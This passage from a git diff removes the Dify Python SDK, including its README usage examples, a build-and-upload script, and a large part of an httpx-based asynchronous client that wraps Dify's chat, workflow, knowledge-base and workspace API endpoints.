CompletionClient -completion_response = completion_client.create_completion_message(inputs={"query": "What's the weather like today?"}, - response_mode="blocking", user="user_id") -completion_response.raise_for_status() - -result = completion_response.json() - -print(result.get('answer')) -``` - -- completion using vision model, like gpt-4-vision - -```python -from dify_client import CompletionClient - -api_key = "your_api_key" - -# Initialize CompletionClient -completion_client = CompletionClient(api_key) - -files = [{ - "type": "image", - "transfer_method": "remote_url", - "url": "your_image_url" -}] - -# files = [{ -# "type": "image", -# "transfer_method": "local_file", -# "upload_file_id": "your_file_id" -# }] - -# Create Completion Message using CompletionClient -completion_response = completion_client.create_completion_message(inputs={"query": "Describe the picture."}, - response_mode="blocking", user="user_id", files=files) -completion_response.raise_for_status() - -result = completion_response.json() - -print(result.get('answer')) -``` - -- chat generate with `streaming` response_mode - -```python -import json -from dify_client import ChatClient - -api_key = "your_api_key" - -# Initialize ChatClient -chat_client = ChatClient(api_key) - -# Create Chat Message using ChatClient -chat_response = chat_client.create_chat_message(inputs={}, query="Hello", user="user_id", response_mode="streaming") -chat_response.raise_for_status() - -for line in chat_response.iter_lines(decode_unicode=True): - line = line.split('data:', 1)[-1] - if line.strip(): - line = json.loads(line.strip()) - print(line.get('answer')) -``` - -- chat using vision model, like gpt-4-vision - -```python -from dify_client import ChatClient - -api_key = "your_api_key" - -# Initialize ChatClient -chat_client = ChatClient(api_key) - -files = [{ - "type": "image", - "transfer_method": "remote_url", - "url": "your_image_url" -}] - -# files = [{ -# "type": "image", -# "transfer_method": "local_file", -# "upload_file_id": "your_file_id" -# }] - -# Create Chat Message using ChatClient -chat_response = chat_client.create_chat_message(inputs={}, query="Describe the picture.", user="user_id", - response_mode="blocking", files=files) -chat_response.raise_for_status() - -result = chat_response.json() - -print(result.get("answer")) -``` - -- upload file when using vision model - -```python -from dify_client import DifyClient - -api_key = "your_api_key" - -# Initialize Client -dify_client = DifyClient(api_key) - -file_path = "your_image_file_path" -file_name = "panda.jpeg" -mime_type = "image/jpeg" - -with open(file_path, "rb") as file: - files = { - "file": (file_name, file, mime_type) - } - response = dify_client.file_upload("user_id", files) - - result = response.json() - print(f'upload_file_id: {result.get("id")}') -``` - -- Others - -```python -from dify_client import ChatClient - -api_key = "your_api_key" - -# Initialize Client -client = ChatClient(api_key) - -# Get App parameters -parameters = client.get_application_parameters(user="user_id") -parameters.raise_for_status() - -print('[parameters]') -print(parameters.json()) - -# Get Conversation List (only for chat) -conversations = client.get_conversations(user="user_id") -conversations.raise_for_status() - -print('[conversations]') -print(conversations.json()) - -# Get Message List (only for chat) -messages = client.get_conversation_messages(user="user_id", conversation_id="conversation_id") -messages.raise_for_status() - -print('[messages]') -print(messages.json()) - -# Rename Conversation (only for chat) -rename_conversation_response = client.rename_conversation(conversation_id="conversation_id", - name="new_name", user="user_id") -rename_conversation_response.raise_for_status() - -print('[rename result]') -print(rename_conversation_response.json()) -``` - -- Using the Workflow Client - -```python -import json -import requests -from dify_client import WorkflowClient - -api_key = "your_api_key" - -# Initialize Workflow Client -client = WorkflowClient(api_key) - -# Prepare parameters for Workflow Client -user_id = "your_user_id" -context = "previous user interaction / metadata" -user_prompt = "What is the capital of France?" - -inputs = { - "context": context, - "user_prompt": user_prompt, - # Add other input fields expected by your workflow (e.g., additional context, task parameters) - -} - -# Set response mode (default: streaming) -response_mode = "blocking" - -# Run the workflow -response = client.run(inputs=inputs, response_mode=response_mode, user=user_id) -response.raise_for_status() - -# Parse result -result = json.loads(response.text) - -answer = result.get("data").get("outputs") - -print(answer["answer"]) - -``` - -- Dataset Management - -```python -from dify_client import KnowledgeBaseClient - -api_key = "your_api_key" -dataset_id = "your_dataset_id" - -# Use context manager to ensure proper resource cleanup -with KnowledgeBaseClient(api_key, dataset_id) as kb_client: - # Get dataset information - dataset_info = kb_client.get_dataset() - dataset_info.raise_for_status() - print(dataset_info.json()) - - # Update dataset configuration - update_response = kb_client.update_dataset( - name="Updated Dataset Name", - description="Updated description", - indexing_technique="high_quality" - ) - update_response.raise_for_status() - print(update_response.json()) - - # Batch update document status - batch_response = kb_client.batch_update_document_status( - action="enable", - document_ids=["doc_id_1", "doc_id_2", "doc_id_3"] - ) - batch_response.raise_for_status() - print(batch_response.json()) -``` - -- Conversation Variables Management - -```python -from dify_client import ChatClient - -api_key = "your_api_key" - -# Use context manager to ensure proper resource cleanup -with ChatClient(api_key) as chat_client: - # Get all conversation variables - variables = chat_client.get_conversation_variables( - conversation_id="conversation_id", - user="user_id" - ) - variables.raise_for_status() - print(variables.json()) - - # Update a specific conversation variable - update_var = chat_client.update_conversation_variable( - conversation_id="conversation_id", - variable_id="variable_id", - value="new_value", - user="user_id" - ) - update_var.raise_for_status() - print(update_var.json()) -``` - -### Asynchronous Usage - -The SDK provides full async/await support for all API operations using `httpx.AsyncClient`. All async clients mirror their synchronous counterparts but require `await` for method calls. - -- async chat with `blocking` response_mode - -```python -import asyncio -from dify_client import AsyncChatClient - -api_key = "your_api_key" - -async def main(): - # Use async context manager for proper resource cleanup - async with AsyncChatClient(api_key) as client: - response = await client.create_chat_message( - inputs={}, - query="Hello, how are you?", - user="user_id", - response_mode="blocking" - ) - response.raise_for_status() - result = response.json() - print(result.get('answer')) - -# Run the async function -asyncio.run(main()) -``` - -- async completion with `streaming` response_mode - -```python -import asyncio -import json -from dify_client import AsyncCompletionClient - -api_key = "your_api_key" - -async def main(): - async with AsyncCompletionClient(api_key) as client: - response = await client.create_completion_message( - inputs={"query": "What's the weather?"}, - response_mode="streaming", - user="user_id" - ) - response.raise_for_status() - - # Stream the response - async for line in response.aiter_lines(): - if line.startswith('data:'): - data = line[5:].strip() - if data: - chunk = json.loads(data) - print(chunk.get('answer', ''), end='', flush=True) - -asyncio.run(main()) -``` - -- async workflow execution - -```python -import asyncio -from dify_client import AsyncWorkflowClient - -api_key = "your_api_key" - -async def main(): - async with AsyncWorkflowClient(api_key) as client: - response = await client.run( - inputs={"query": "What is machine learning?"}, - response_mode="blocking", - user="user_id" - ) - response.raise_for_status() - result = response.json() - print(result.get("data").get("outputs")) - -asyncio.run(main()) -``` - -- async dataset management - -```python -import asyncio -from dify_client import AsyncKnowledgeBaseClient - -api_key = "your_api_key" -dataset_id = "your_dataset_id" - -async def main(): - async with AsyncKnowledgeBaseClient(api_key, dataset_id) as kb_client: - # Get dataset information - dataset_info = await kb_client.get_dataset() - dataset_info.raise_for_status() - print(dataset_info.json()) - - # List documents - docs = await kb_client.list_documents(page=1, page_size=10) - docs.raise_for_status() - print(docs.json()) - -asyncio.run(main()) -``` - -**Benefits of Async Usage:** - -- **Better Performance**: Handle multiple concurrent API requests efficiently -- **Non-blocking I/O**: Don't block the event loop during network operations -- **Scalability**: Ideal for applications handling many simultaneous requests -- **Modern Python**: Leverages Python's native async/await syntax - -**Available Async Clients:** - -- `AsyncDifyClient` - Base async client -- `AsyncChatClient` - Async chat operations -- `AsyncCompletionClient` - Async completion operations -- `AsyncWorkflowClient` - Async workflow operations -- `AsyncKnowledgeBaseClient` - Async dataset/knowledge base operations -- `AsyncWorkspaceClient` - Async workspace operations - -``` -``` diff --git a/sdks/python-client/build.sh b/sdks/python-client/build.sh deleted file mode 100755 index 525f57c1ef..0000000000 --- a/sdks/python-client/build.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash - -set -e - -rm -rf build dist *.egg-info - -pip install setuptools wheel twine -python setup.py sdist bdist_wheel -twine upload dist/* diff --git a/sdks/python-client/dify_client/__init__.py b/sdks/python-client/dify_client/__init__.py deleted file mode 100644 index ced093b20a..0000000000 --- a/sdks/python-client/dify_client/__init__.py +++ /dev/null @@ -1,34 +0,0 @@ -from dify_client.client import ( - ChatClient, - CompletionClient, - DifyClient, - KnowledgeBaseClient, - WorkflowClient, - WorkspaceClient, -) - -from dify_client.async_client import ( - AsyncChatClient, - AsyncCompletionClient, - AsyncDifyClient, - AsyncKnowledgeBaseClient, - AsyncWorkflowClient, - AsyncWorkspaceClient, -) - -__all__ = [ - # Synchronous clients - "ChatClient", - "CompletionClient", - "DifyClient", - "KnowledgeBaseClient", - "WorkflowClient", - "WorkspaceClient", - # Asynchronous clients - "AsyncChatClient", - "AsyncCompletionClient", - "AsyncDifyClient", - "AsyncKnowledgeBaseClient", - "AsyncWorkflowClient", - "AsyncWorkspaceClient", -] diff --git a/sdks/python-client/dify_client/async_client.py b/sdks/python-client/dify_client/async_client.py deleted file mode 100644 index 23126cf326..0000000000 --- a/sdks/python-client/dify_client/async_client.py +++ /dev/null @@ -1,2074 +0,0 @@ -"""Asynchronous Dify API client. - -This module provides async/await support for all Dify API operations using httpx.AsyncClient. -All client classes mirror their synchronous counterparts but require `await` for method calls. - -Example: - import asyncio - from dify_client import AsyncChatClient - - async def main(): - async with AsyncChatClient(api_key="your-key") as client: - response = await client.create_chat_message( - inputs={}, - query="Hello", - user="user-123" - ) - print(response.json()) - - asyncio.run(main()) -""" - -import json -import os -from typing import Literal, Dict, List, Any, IO, Optional, Union - -import aiofiles -import httpx - - -class AsyncDifyClient: - """Asynchronous Dify API client. - - This client uses httpx.AsyncClient for efficient async connection pooling. - It's recommended to use this client as a context manager: - - Example: - async with AsyncDifyClient(api_key="your-key") as client: - response = await client.get_app_info() - """ - - def __init__( - self, - api_key: str, - base_url: str = "https://api.dify.ai/v1", - timeout: float = 60.0, - ): - """Initialize the async Dify client. - - Args: - api_key: Your Dify API key - base_url: Base URL for the Dify API - timeout: Request timeout in seconds (default: 60.0) - """ - self.api_key = api_key - self.base_url = base_url - self._client = httpx.AsyncClient( - base_url=base_url, - timeout=httpx.Timeout(timeout, connect=5.0), - ) - - async def __aenter__(self): - """Support async context manager protocol.""" - return self - - async def __aexit__(self, exc_type, exc_val, exc_tb): - """Clean up resources when exiting async context.""" - await self.aclose() - - async def aclose(self): - """Close the async HTTP client and release resources.""" - if hasattr(self, "_client"): - await self._client.aclose() - - async def _send_request( - self, - method: str, - endpoint: str, - json: Dict | None = None, - params: Dict | None = None, - stream: bool = False, - **kwargs, - ): - """Send an async HTTP request to the Dify API. - - Args: - method: HTTP method (GET, POST, PUT, PATCH, DELETE) - endpoint: API endpoint path - json: JSON request body - params: Query parameters - stream: Whether to stream the response - **kwargs: Additional arguments to pass to httpx.request - - Returns: - httpx.Response object - """ - headers = { - "Authorization": f"Bearer {self.api_key}", - "Content-Type": "application/json", - } - - response = await self._client.request( - method, - endpoint, - json=json, - params=params, - headers=headers, - **kwargs, - ) - - return response - - async def _send_request_with_files(self, method: str, endpoint: str, data: dict, files: dict): - """Send an async HTTP request with file uploads. - - Args: - method: HTTP method (POST, PUT, etc.) - endpoint: API endpoint path - data: Form data - files: Files to upload - - Returns: - httpx.Response object - """ - headers = {"Authorization": f"Bearer {self.api_key}"} - - response = await self._client.request( - method, - endpoint, - data=data, - headers=headers, - files=files, - ) - - return response - - async def message_feedback(self, message_id: str, rating: Literal["like", "dislike"], user: str): - """Send feedback for a message.""" - data = {"rating": rating, "user": user} - return await self._send_request("POST", f"/messages/{message_id}/feedbacks", data) - - async def get_application_parameters(self, user: str): - """Get application parameters.""" - params = {"user": user} - return await self._send_request("GET", "/parameters", params=params) - - async def file_upload(self, user: str, files: dict): - """Upload a file.""" - data = {"user": user} - return await self._send_request_with_files("POST", "/files/upload", data=data, files=files) - - async def text_to_audio(self, text: str, user: str, streaming: bool = False): - """Convert text to audio.""" - data = {"text": text, "user": user, "streaming": streaming} - return await self._send_request("POST", "/text-to-audio", json=data) - - async def get_meta(self, user: str): - """Get metadata.""" - params = {"user": user} - return await self._send_request("GET", "/meta", params=params) - - async def get_app_info(self): - """Get basic application information including name, description, tags, and mode.""" - return await self._send_request("GET", "/info") - - async def get_app_site_info(self): - """Get application site information.""" - return await self._send_request("GET", "/site") - - async def get_file_preview(self, file_id: str): - """Get file preview by file ID.""" - return await self._send_request("GET", f"/files/{file_id}/preview") - - # App Configuration APIs - async def get_app_site_config(self, app_id: str): - """Get app site configuration. - - Args: - app_id: ID of the app - - Returns: - App site configuration - """ - url = f"/apps/{app_id}/site/config" - return await self._send_request("GET", url) - - async def update_app_site_config(self, app_id: str, config_data: Dict[str, Any]): - """Update app site configuration. - - Args: - app_id: ID of the app - config_data: Configuration data to update - - Returns: - Updated app site configuration - """ - url = f"/apps/{app_id}/site/config" - return await self._send_request("PUT", url, json=config_data) - - async def get_app_api_tokens(self, app_id: str): - """Get API tokens for an app. - - Args: - app_id: ID of the app - - Returns: - List of API tokens - """ - url = f"/apps/{app_id}/api-tokens" - return await self._send_request("GET", url) - - async def create_app_api_token(self, app_id: str, name: str, description: str | None = None): - """Create a new API token for an app. - - Args: - app_id: ID of the app - name: Name for the API token - description: Description for the API token (optional) - - Returns: - Created API token information - """ - data = {"name": name, "description": description} - url = f"/apps/{app_id}/api-tokens" - return await self._send_request("POST", url, json=data) - - async def delete_app_api_token(self, app_id: str, token_id: str): - """Delete an API token. - - Args: - app_id: ID of the app - token_id: ID of the token to delete - - Returns: - Deletion result - """ - url = f"/apps/{app_id}/api-tokens/{token_id}" - return await self._send_request("DELETE", url) - - -class AsyncCompletionClient(AsyncDifyClient): - """Async client for Completion API operations.""" - - async def create_completion_message( - self, - inputs: dict, - response_mode: Literal["blocking", "streaming"], - user: str, - files: Dict | None = None, - ): - """Create a completion message. - - Args: - inputs: Input variables for the completion - response_mode: Response mode ('blocking' or 'streaming') - user: User identifier - files: Optional files to include - - Returns: - httpx.Response object - """ - data = { - "inputs": inputs, - "response_mode": response_mode, - "user": user, - "files": files, - } - return await self._send_request( - "POST", - "/completion-messages", - data, - stream=(response_mode == "streaming"), - ) - - -class AsyncChatClient(AsyncDifyClient): - """Async client for Chat API operations.""" - - async def create_chat_message( - self, - inputs: dict, - query: str, - user: str, - response_mode: Literal["blocking", "streaming"] = "blocking", - conversation_id: str | None = None, - files: Dict | None = None, - ): - """Create a chat message. - - Args: - inputs: Input variables for the chat - query: User query/message - user: User identifier - response_mode: Response mode ('blocking' or 'streaming') - conversation_id: Optional conversation ID for context - files: Optional files to include - - Returns: - httpx.Response object - """ - data = { - "inputs": inputs, - "query": query, - "user": user, - "response_mode": response_mode, - "files": files, - } - if conversation_id: - data["conversation_id"] = conversation_id - - return await self._send_request( - "POST", - "/chat-messages", - data, - stream=(response_mode == "streaming"), - ) - - async def get_suggested(self, message_id: str, user: str): - """Get suggested questions for a message.""" - params = {"user": user} - return await self._send_request("GET", f"/messages/{message_id}/suggested", params=params) - - async def stop_message(self, task_id: str, user: str): - """Stop a running message generation.""" - data = {"user": user} - return await self._send_request("POST", f"/chat-messages/{task_id}/stop", data) - - async def get_conversations( - self, - user: str, - last_id: str | None = None, - limit: int | None = None, - pinned: bool | None = None, - ): - """Get list of conversations.""" - params = {"user": user, "last_id": last_id, "limit": limit, "pinned": pinned} - return await self._send_request("GET", "/conversations", params=params) - - async def get_conversation_messages( - self, - user: str, - conversation_id: str | None = None, - first_id: str | None = None, - limit: int | None = None, - ): - """Get messages from a conversation.""" - params = { - "user": user, - "conversation_id": conversation_id, - "first_id": first_id, - "limit": limit, - } - return await self._send_request("GET", "/messages", params=params) - - async def rename_conversation(self, conversation_id: str, name: str, auto_generate: bool, user: str): - """Rename a conversation.""" - data = {"name": name, "auto_generate": auto_generate, "user": user} - return await self._send_request("POST", f"/conversations/{conversation_id}/name", data) - - async def delete_conversation(self, conversation_id: str, user: str): - """Delete a conversation.""" - data = {"user": user} - return await self._send_request("DELETE", f"/conversations/{conversation_id}", data) - - async def audio_to_text(self, audio_file: Union[IO[bytes], tuple], user: str): - """Convert audio to text.""" - data = {"user": user} - files = {"file": audio_file} - return await self._send_request_with_files("POST", "/audio-to-text", data, files) - - # Annotation APIs - async def annotation_reply_action( - self, - action: Literal["enable", "disable"], - score_threshold: float, - embedding_provider_name: str, - embedding_model_name: str, - ): - """Enable or disable annotation reply feature.""" - data = { - "score_threshold": score_threshold, - "embedding_provider_name": embedding_provider_name, - "embedding_model_name": embedding_model_name, - } - return await self._send_request("POST", f"/apps/annotation-reply/{action}", json=data) - - async def get_annotation_reply_status(self, action: Literal["enable", "disable"], job_id: str): - """Get the status of an annotation reply action job.""" - return await self._send_request("GET", f"/apps/annotation-reply/{action}/status/{job_id}") - - async def list_annotations(self, page: int = 1, limit: int = 20, keyword: str | None = None): - """List annotations for the application.""" - params = {"page": page, "limit": limit, "keyword": keyword} - return await self._send_request("GET", "/apps/annotations", params=params) - - async def create_annotation(self, question: str, answer: str): - """Create a new annotation.""" - data = {"question": question, "answer": answer} - return await self._send_request("POST", "/apps/annotations", json=data) - - async def update_annotation(self, annotation_id: str, question: str, answer: str): - """Update an existing annotation.""" - data = {"question": question, "answer": answer} - return await self._send_request("PUT", f"/apps/annotations/{annotation_id}", json=data) - - async def delete_annotation(self, annotation_id: str): - """Delete an annotation.""" - return await self._send_request("DELETE", f"/apps/annotations/{annotation_id}") - - # Enhanced Annotation APIs - async def get_annotation_reply_job_status(self, action: str, job_id: str): - """Get status of an annotation reply action job.""" - url = f"/apps/annotation-reply/{action}/status/{job_id}" - return await self._send_request("GET", url) - - async def list_annotations_with_pagination(self, page: int = 1, limit: int = 20, keyword: str | None = None): - """List annotations for application with pagination.""" - params = {"page": page, "limit": limit} - if keyword: - params["keyword"] = keyword - return await self._send_request("GET", "/apps/annotations", params=params) - - async def create_annotation_with_response(self, question: str, answer: str): - """Create a new annotation with full response handling.""" - data = {"question": question, "answer": answer} - return await self._send_request("POST", "/apps/annotations", json=data) - - async def update_annotation_with_response(self, annotation_id: str, question: str, answer: str): - """Update an existing annotation with full response handling.""" - data = {"question": question, "answer": answer} - url = f"/apps/annotations/{annotation_id}" - return await self._send_request("PUT", url, json=data) - - async def delete_annotation_with_response(self, annotation_id: str): - """Delete an annotation with full response handling.""" - url = f"/apps/annotations/{annotation_id}" - return await self._send_request("DELETE", url) - - # Conversation Variables APIs - async def get_conversation_variables(self, conversation_id: str, user: str): - """Get all variables for a specific conversation. - - Args: - conversation_id: The conversation ID to query variables for - user: User identifier - - Returns: - Response from the API containing: - - variables: List of conversation variables with their values - - conversation_id: The conversation ID - """ - params = {"user": user} - url = f"/conversations/{conversation_id}/variables" - return await self._send_request("GET", url, params=params) - - async def update_conversation_variable(self, conversation_id: str, variable_id: str, value: Any, user: str): - """Update a specific conversation variable. - - Args: - conversation_id: The conversation ID - variable_id: The variable ID to update - value: New value for the variable - user: User identifier - - Returns: - Response from the API with updated variable information - """ - data = {"value": value, "user": user} - url = f"/conversations/{conversation_id}/variables/{variable_id}" - return await self._send_request("PATCH", url, json=data) - - # Enhanced Conversation Variable APIs - async def list_conversation_variables_with_pagination( - self, conversation_id: str, user: str, page: int = 1, limit: int = 20 - ): - """List conversation variables with pagination.""" - params = {"page": page, "limit": limit, "user": user} - url = f"/conversations/{conversation_id}/variables" - return await self._send_request("GET", url, params=params) - - async def update_conversation_variable_with_response( - self, conversation_id: str, variable_id: str, user: str, value: Any - ): - """Update a conversation variable with full response handling.""" - data = {"value": value, "user": user} - url = f"/conversations/{conversation_id}/variables/{variable_id}" - return await self._send_request("PUT", url, data=data) - - # Additional annotation methods for API parity - async def get_annotation_reply_job_status(self, action: str, job_id: str): - """Get status of an annotation reply action job.""" - url = f"/apps/annotation-reply/{action}/status/{job_id}" - return await self._send_request("GET", url) - - async def list_annotations_with_pagination(self, page: int = 1, limit: int = 20, keyword: str | None = None): - """List annotations for application with pagination.""" - params = {"page": page, "limit": limit} - if keyword: - params["keyword"] = keyword - return await self._send_request("GET", "/apps/annotations", params=params) - - async def create_annotation_with_response(self, question: str, answer: str): - """Create a new annotation with full response handling.""" - data = {"question": question, "answer": answer} - return await self._send_request("POST", "/apps/annotations", json=data) - - async def update_annotation_with_response(self, annotation_id: str, question: str, answer: str): - """Update an existing annotation with full response handling.""" - data = {"question": question, "answer": answer} - url = f"/apps/annotations/{annotation_id}" - return await self._send_request("PUT", url, json=data) - - async def delete_annotation_with_response(self, annotation_id: str): - """Delete an annotation with full response handling.""" - url = f"/apps/annotations/{annotation_id}" - return await self._send_request("DELETE", url) - - -class AsyncWorkflowClient(AsyncDifyClient): - """Async client for Workflow API operations.""" - - async def run( - self, - inputs: dict, - response_mode: Literal["blocking", "streaming"] = "streaming", - user: str = "abc-123", - ): - """Run a workflow.""" - data = {"inputs": inputs, "response_mode": response_mode, "user": user} - return await self._send_request("POST", "/workflows/run", data) - - async def stop(self, task_id: str, user: str): - """Stop a running workflow task.""" - data = {"user": user} - return await self._send_request("POST", f"/workflows/tasks/{task_id}/stop", data) - - async def get_result(self, workflow_run_id: str): - """Get workflow run result.""" - return await self._send_request("GET", f"/workflows/run/{workflow_run_id}") - - async def get_workflow_logs( - self, - keyword: str = None, - status: Literal["succeeded", "failed", "stopped"] | None = None, - page: int = 1, - limit: int = 20, - created_at__before: str = None, - created_at__after: str = None, - created_by_end_user_session_id: str = None, - created_by_account: str = None, - ): - """Get workflow execution logs with optional filtering.""" - params = { - "page": page, - "limit": limit, - "keyword": keyword, - "status": status, - "created_at__before": created_at__before, - "created_at__after": created_at__after, - "created_by_end_user_session_id": created_by_end_user_session_id, - "created_by_account": created_by_account, - } - return await self._send_request("GET", "/workflows/logs", params=params) - - async def run_specific_workflow( - self, - workflow_id: str, - inputs: dict, - response_mode: Literal["blocking", "streaming"] = "streaming", - user: str = "abc-123", - ): - """Run a specific workflow by workflow ID.""" - data = {"inputs": inputs, "response_mode": response_mode, "user": user} - return await self._send_request( - "POST", - f"/workflows/{workflow_id}/run", - data, - stream=(response_mode == "streaming"), - ) - - # Enhanced Workflow APIs - async def get_workflow_draft(self, app_id: str): - """Get workflow draft configuration. - - Args: - app_id: ID of the workflow app - - Returns: - Workflow draft configuration - """ - url = f"/apps/{app_id}/workflow/draft" - return await self._send_request("GET", url) - - async def update_workflow_draft(self, app_id: str, workflow_data: Dict[str, Any]): - """Update workflow draft configuration. - - Args: - app_id: ID of the workflow app - workflow_data: Workflow configuration data - - Returns: - Updated workflow draft - """ - url = f"/apps/{app_id}/workflow/draft" - return await self._send_request("PUT", url, json=workflow_data) - - async def publish_workflow(self, app_id: str): - """Publish workflow from draft. - - Args: - app_id: ID of the workflow app - - Returns: - Published workflow information - """ - url = f"/apps/{app_id}/workflow/publish" - return await self._send_request("POST", url) - - async def get_workflow_run_history( - self, - app_id: str, - page: int = 1, - limit: int = 20, - status: Literal["succeeded", "failed", "stopped"] | None = None, - ): - """Get workflow run history. - - Args: - app_id: ID of the workflow app - page: Page number (default: 1) - limit: Number of items per page (default: 20) - status: Filter by status (optional) - - Returns: - Paginated workflow run history - """ - params = {"page": page, "limit": limit} - if status: - params["status"] = status - url = f"/apps/{app_id}/workflow/runs" - return await self._send_request("GET", url, params=params) - - -class AsyncWorkspaceClient(AsyncDifyClient): - """Async client for workspace-related operations.""" - - async def get_available_models(self, model_type: str): - """Get available models by model type.""" - url = f"/workspaces/current/models/model-types/{model_type}" - return await self._send_request("GET", url) - - async def get_available_models_by_type(self, model_type: str): - """Get available models by model type (enhanced version).""" - url = f"/workspaces/current/models/model-types/{model_type}" - return await self._send_request("GET", url) - - async def get_model_providers(self): - """Get all model providers.""" - return await self._send_request("GET", "/workspaces/current/model-providers") - - async def get_model_provider_models(self, provider_name: str): - """Get models for a specific provider.""" - url = f"/workspaces/current/model-providers/{provider_name}/models" - return await self._send_request("GET", url) - - async def validate_model_provider_credentials(self, provider_name: str, credentials: Dict[str, Any]): - """Validate model provider credentials.""" - url = f"/workspaces/current/model-providers/{provider_name}/credentials/validate" - return await self._send_request("POST", url, json=credentials) - - # File Management APIs - async def get_file_info(self, file_id: str): - """Get information about a specific file.""" - url = f"/files/{file_id}/info" - return await self._send_request("GET", url) - - async def get_file_download_url(self, file_id: str): - """Get download URL for a file.""" - url = f"/files/{file_id}/download-url" - return await self._send_request("GET", url) - - async def delete_file(self, file_id: str): - """Delete a file.""" - url = f"/files/{file_id}" - return await self._send_request("DELETE", url) - - -class AsyncKnowledgeBaseClient(AsyncDifyClient): - """Async client for Knowledge Base API operations.""" - - def __init__( - self, - api_key: str, - base_url: str = "https://api.dify.ai/v1", - dataset_id: str | None = None, - timeout: float = 60.0, - ): - """Construct an AsyncKnowledgeBaseClient object. - - Args: - api_key: API key of Dify - base_url: Base URL of Dify API - dataset_id: ID of the dataset - timeout: Request timeout in seconds - """ - super().__init__(api_key=api_key, base_url=base_url, timeout=timeout) - self.dataset_id = dataset_id - - def _get_dataset_id(self): - """Get the dataset ID, raise error if not set.""" - if self.dataset_id is None: - raise ValueError("dataset_id is not set") - return self.dataset_id - - async def create_dataset(self, name: str, **kwargs): - """Create a new dataset.""" - return await self._send_request("POST", "/datasets", {"name": name}, **kwargs) - - async def list_datasets(self, page: int = 1, page_size: int = 20, **kwargs): - """List all datasets.""" - return await self._send_request("GET", "/datasets", params={"page": page, "limit": page_size}, **kwargs) - - async def create_document_by_text(self, name: str, text: str, extra_params: Dict | None = None, **kwargs): - """Create a document by text. - - Args: - name: Name of the document - text: Text content of the document - extra_params: Extra parameters for the API - - Returns: - Response from the API - """ - data = { - "indexing_technique": "high_quality", - "process_rule": {"mode": "automatic"}, - "name": name, - "text": text, - } - if extra_params is not None and isinstance(extra_params, dict): - data.update(extra_params) - url = f"/datasets/{self._get_dataset_id()}/document/create_by_text" - return await self._send_request("POST", url, json=data, **kwargs) - - async def update_document_by_text( - self, - document_id: str, - name: str, - text: str, - extra_params: Dict | None = None, - **kwargs, - ): - """Update a document by text.""" - data = {"name": name, "text": text} - if extra_params is not None and isinstance(extra_params, dict): - data.update(extra_params) - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/update_by_text" - return await self._send_request("POST", url, json=data, **kwargs) - - async def create_document_by_file( - self, - file_path: str, - original_document_id: str | None = None, - extra_params: Dict | None = None, - ): - """Create a document by file.""" - async with aiofiles.open(file_path, "rb") as f: - files = {"file": (os.path.basename(file_path), f)} - data = { - "process_rule": {"mode": "automatic"}, - "indexing_technique": "high_quality", - } - if extra_params is not None and isinstance(extra_params, dict): - data.update(extra_params) - if original_document_id is not None: - data["original_document_id"] = original_document_id - url = f"/datasets/{self._get_dataset_id()}/document/create_by_file" - return await self._send_request_with_files("POST", url, {"data": json.dumps(data)}, files) - - async def update_document_by_file(self, document_id: str, file_path: str, extra_params: Dict | None = None): - """Update a document by file.""" - async with aiofiles.open(file_path, "rb") as f: - files = {"file": (os.path.basename(file_path), f)} - data = {} - if extra_params is not None and isinstance(extra_params, dict): - data.update(extra_params) - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/update_by_file" - return await self._send_request_with_files("POST", url, {"data": json.dumps(data)}, files) - - async def batch_indexing_status(self, batch_id: str, **kwargs): - """Get the status of the batch indexing.""" - url = f"/datasets/{self._get_dataset_id()}/documents/{batch_id}/indexing-status" - return await self._send_request("GET", url, **kwargs) - - async def delete_dataset(self): - """Delete this dataset.""" - url = f"/datasets/{self._get_dataset_id()}" - return await self._send_request("DELETE", url) - - async def delete_document(self, document_id: str): - """Delete a document.""" - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}" - return await self._send_request("DELETE", url) - - async def list_documents( - self, - page: int | None = None, - page_size: int | None = None, - keyword: str | None = None, - **kwargs, - ): - """Get a list of documents in this dataset.""" - params = { - "page": page, - "limit": page_size, - "keyword": keyword, - } - url = f"/datasets/{self._get_dataset_id()}/documents" - return await self._send_request("GET", url, params=params, **kwargs) - - async def add_segments(self, document_id: str, segments: list[dict], **kwargs): - """Add segments to a document.""" - data = {"segments": segments} - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/segments" - return await self._send_request("POST", url, json=data, **kwargs) - - async def query_segments( - self, - document_id: str, - keyword: str | None = None, - status: str | None = None, - **kwargs, - ): - """Query segments in this document. - - Args: - document_id: ID of the document - keyword: Query keyword (optional) - status: Status of the segment (optional, e.g., 'completed') - **kwargs: Additional parameters to pass to the API. - Can include a 'params' dict for extra query parameters. - - Returns: - Response from the API - """ - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/segments" - params = { - "keyword": keyword, - "status": status, - } - if "params" in kwargs: - params.update(kwargs.pop("params")) - return await self._send_request("GET", url, params=params, **kwargs) - - async def delete_document_segment(self, document_id: str, segment_id: str): - """Delete a segment from a document.""" - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/segments/{segment_id}" - return await self._send_request("DELETE", url) - - async def update_document_segment(self, document_id: str, segment_id: str, segment_data: dict, **kwargs): - """Update a segment in a document.""" - data = {"segment": segment_data} - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/segments/{segment_id}" - return await self._send_request("POST", url, json=data, **kwargs) - - # Advanced Knowledge Base APIs - async def hit_testing( - self, - query: str, - retrieval_model: Dict[str, Any] = None, - external_retrieval_model: Dict[str, Any] = None, - ): - """Perform hit testing on the dataset.""" - data = {"query": query} - if retrieval_model: - data["retrieval_model"] = retrieval_model - if external_retrieval_model: - data["external_retrieval_model"] = external_retrieval_model - url = f"/datasets/{self._get_dataset_id()}/hit-testing" - return await self._send_request("POST", url, json=data) - - async def get_dataset_metadata(self): - """Get dataset metadata.""" - url = f"/datasets/{self._get_dataset_id()}/metadata" - return await self._send_request("GET", url) - - async def create_dataset_metadata(self, metadata_data: Dict[str, Any]): - """Create dataset metadata.""" - url = f"/datasets/{self._get_dataset_id()}/metadata" - return await self._send_request("POST", url, json=metadata_data) - - async def update_dataset_metadata(self, metadata_id: str, metadata_data: Dict[str, Any]): - """Update dataset metadata.""" - url = f"/datasets/{self._get_dataset_id()}/metadata/{metadata_id}" - return await self._send_request("PATCH", url, json=metadata_data) - - async def get_built_in_metadata(self): - """Get built-in metadata.""" - url = f"/datasets/{self._get_dataset_id()}/metadata/built-in" - return await self._send_request("GET", url) - - async def 